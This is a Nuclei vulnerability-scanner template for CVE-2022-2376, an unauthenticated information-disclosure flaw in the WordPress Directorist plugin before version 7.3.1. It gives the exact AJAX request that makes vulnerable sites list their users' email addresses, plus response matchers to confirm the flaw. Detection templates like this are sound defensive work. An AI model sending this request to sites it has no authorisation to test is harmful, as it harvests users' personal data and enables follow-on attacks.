id: CVE-2022-2376

info:
  name: WordPress Directorist <7.3.1 - Information Disclosure
  author: Random-Robbie
  severity: medium
  description: WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
  impact: |
    An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks.
  remediation: Fixed in version 7.3.1.
  reference:
    - https://wpscan.com/vulnerability/437c4330-376a-4392-86c6-c4c7ed9583ad
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2376
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2376
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2376
    cwe-id: CWE-862
    epss-score: 0.04117
    epss-percentile: 0.91273
    cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wpwax
    product: directorist
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wpscan,wordpress,wp,directorist,unauth,disclosure,wpwax

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'directorist-authors__card__details__top'
          - 'directorist-authors__card__info-list'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204881a02cf48ccb3ae38a2dd0c3bce94269852289dd11313a73e84273dbf76154022100b12b57e3640987902f6b5cc6aab3b77301ffbc493d695301293037e08a9fe276:922c64590222798bb761d5b6d8e72950